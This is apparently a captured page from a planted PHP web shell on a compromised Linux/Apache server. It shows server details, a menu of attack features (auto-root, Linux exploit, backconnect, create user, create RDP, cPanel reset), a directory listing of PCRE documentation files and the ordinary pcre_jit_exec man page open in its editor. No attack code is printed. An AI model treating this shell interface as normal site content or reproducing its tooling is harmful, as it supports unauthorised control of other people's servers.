Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.141.21.199
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pcre-devel-8.32 /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
7.24
KB
-rw-r--r--
pcre-config.html
3.55
KB
-rw-r--r--
pcre.html
9.17
KB
-rw-r--r--
pcre16.html
15.57
KB
-rw-r--r--
pcre_assign_jit_stack.html
2.46
KB
-rw-r--r--
pcre_compile.html
4.42
KB
-rw-r--r--
pcre_compile2.html
4.57
KB
-rw-r--r--
pcre_config.html
3.7
KB
-rw-r--r--
pcre_copy_named_substring.html
2.26
KB
-rw-r--r--
pcre_copy_substring.html
2.03
KB
-rw-r--r--
pcre_dfa_exec.html
5.65
KB
-rw-r--r--
pcre_exec.html
4.78
KB
-rw-r--r--
pcre_free_study.html
1.2
KB
-rw-r--r--
pcre_free_substring.html
1.25
KB
-rw-r--r--
pcre_free_substring_list.html
1.26
KB
-rw-r--r--
pcre_fullinfo.html
4.48
KB
-rw-r--r--
pcre_get_named_substring.html
2.36
KB
-rw-r--r--
pcre_get_stringnumber.html
1.71
KB
-rw-r--r--
pcre_get_stringtable_entries.h...
2
KB
-rw-r--r--
pcre_get_substring.html
2.16
KB
-rw-r--r--
pcre_get_substring_list.html
2.13
KB
-rw-r--r--
pcre_jit_exec.html
4.66
KB
-rw-r--r--
pcre_jit_stack_alloc.html
1.66
KB
-rw-r--r--
pcre_jit_stack_free.html
1.25
KB
-rw-r--r--
pcre_maketables.html
1.36
KB
-rw-r--r--
pcre_pattern_to_host_byte_orde...
1.9
KB
-rw-r--r--
pcre_refcount.html
1.41
KB
-rw-r--r--
pcre_study.html
2.08
KB
-rw-r--r--
pcre_utf16_to_host_byte_order....
1.98
KB
-rw-r--r--
pcre_version.html
1.14
KB
-rw-r--r--
pcreapi.html
125.27
KB
-rw-r--r--
pcrebuild.html
21.44
KB
-rw-r--r--
pcrecallout.html
9.91
KB
-rw-r--r--
pcrecompat.html
8.77
KB
-rw-r--r--
pcrecpp.html
14.06
KB
-rw-r--r--
pcredemo.html
15.81
KB
-rw-r--r--
pcregrep.html
36.86
KB
-rw-r--r--
pcrejit.html
19.68
KB
-rw-r--r--
pcrelimits.html
2.8
KB
-rw-r--r--
pcrematching.html
10.13
KB
-rw-r--r--
pcrepartial.html
21.22
KB
-rw-r--r--
pcrepattern.html
125.07
KB
-rw-r--r--
pcreperform.html
7.64
KB
-rw-r--r--
pcreposix.html
11.87
KB
-rw-r--r--
pcreprecompile.html
7.01
KB
-rw-r--r--
pcresample.html
3.7
KB
-rw-r--r--
pcrestack.html
9.37
KB
-rw-r--r--
pcresyntax.html
15.03
KB
-rw-r--r--
pcretest.html
46.98
KB
-rw-r--r--
pcreunicode.html
11.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pcre_jit_exec.html
<html> <head> <title>pcre_jit_exec specification</title> </head> <body bgcolor="#FFFFFF" text="#00005A" link="#0066FF" alink="#3399FF" vlink="#2222BB"> <h1>pcre_jit_exec man page</h1> <p> Return to the <a href="index.html">PCRE index page</a>. </p> <p> This page is part of the PCRE HTML documentation. It was generated automatically from the original man page. If there is any nonsense in it, please consult the man page, in case the conversion went wrong. <br> <br><b> SYNOPSIS </b><br> <P> <b>#include <pcre.h></b> </P> <P> <b>int pcre_jit_exec(const pcre *<i>code</i>, const pcre_extra *<i>extra</i>,</b> <b>const char *<i>subject</i>, int <i>length</i>, int <i>startoffset</i>,</b> <b>int <i>options</i>, int *<i>ovector</i>, int <i>ovecsize</i>,</b> <b>pcre_jit_stack *<i>jstack</i>);</b> </P> <P> <b>int pcre16_jit_exec(const pcre16 *<i>code</i>, const pcre16_extra *<i>extra</i>,</b> <b>PCRE_SPTR16 <i>subject</i>, int <i>length</i>, int <i>startoffset</i>,</b> <b>int <i>options</i>, int *<i>ovector</i>, int <i>ovecsize</i>,</b> <b>pcre_jit_stack *<i>jstack</i>);</b> </P> <P> <b>int pcre32_jit_exec(const pcre32 *<i>code</i>, const pcre32_extra *<i>extra</i>,</b> <b>PCRE_SPTR32 <i>subject</i>, int <i>length</i>, int <i>startoffset</i>,</b> <b>int <i>options</i>, int *<i>ovector</i>, int <i>ovecsize</i>,</b> <b>pcre_jit_stack *<i>jstack</i>);</b> </P> <br><b> DESCRIPTION </b><br> <P> This function matches a compiled regular expression that has been successfully studied with one of the JIT options against a given subject string, using a matching algorithm that is similar to Perl's. It is a "fast path" interface to JIT, and it bypasses some of the sanity checks that <b>pcre_exec()</b> applies. It returns offsets to captured substrings. Its arguments are: <pre> <i>code</i> Points to the compiled pattern <i>extra</i> Points to an associated <b>pcre[16|32]_extra</b> structure, or is NULL <i>subject</i> Points to the subject string <i>length</i> Length of the subject string, in bytes <i>startoffset</i> Offset in bytes in the subject at which to start matching <i>options</i> Option bits <i>ovector</i> Points to a vector of ints for result offsets <i>ovecsize</i> Number of elements in the vector (a multiple of 3) <i>jstack</i> Pointer to a JIT stack </pre> The allowed options are: <pre> PCRE_NOTBOL Subject string is not the beginning of a line PCRE_NOTEOL Subject string is not the end of a line PCRE_NOTEMPTY An empty string is not a valid match PCRE_NOTEMPTY_ATSTART An empty string at the start of the subject is not a valid match PCRE_NO_UTF16_CHECK Do not check the subject for UTF-16 validity (only relevant if PCRE_UTF16 was set at compile time) PCRE_NO_UTF32_CHECK Do not check the subject for UTF-32 validity (only relevant if PCRE_UTF32 was set at compile time) PCRE_NO_UTF8_CHECK Do not check the subject for UTF-8 validity (only relevant if PCRE_UTF8 was set at compile time) PCRE_PARTIAL ) Return PCRE_ERROR_PARTIAL for a partial PCRE_PARTIAL_SOFT ) match if no full matches are found PCRE_PARTIAL_HARD Return PCRE_ERROR_PARTIAL for a partial match if that is found before a full match </pre> However, the PCRE_NO_UTF[8|16|32]_CHECK options have no effect, as this check is never applied. For details of partial matching, see the <a href="pcrepartial.html"><b>pcrepartial</b></a> page. A <b>pcre_extra</b> structure contains the following fields: <pre> <i>flags</i> Bits indicating which fields are set <i>study_data</i> Opaque data from <b>pcre[16|32]_study()</b> <i>match_limit</i> Limit on internal resource use <i>match_limit_recursion</i> Limit on internal recursion depth <i>callout_data</i> Opaque data passed back to callouts <i>tables</i> Points to character tables or is NULL <i>mark</i> For passing back a *MARK pointer <i>executable_jit</i> Opaque data from JIT compilation </pre> The flag bits are PCRE_EXTRA_STUDY_DATA, PCRE_EXTRA_MATCH_LIMIT, PCRE_EXTRA_MATCH_LIMIT_RECURSION, PCRE_EXTRA_CALLOUT_DATA, PCRE_EXTRA_TABLES, PCRE_EXTRA_MARK and PCRE_EXTRA_EXECUTABLE_JIT. </P> <P> There is a complete description of the PCRE native API in the <a href="pcreapi.html"><b>pcreapi</b></a> page and a description of the JIT API in the <a href="pcrejit.html"><b>pcrejit</b></a> page. <p> Return to the <a href="index.html">PCRE index page</a>. </p>
Close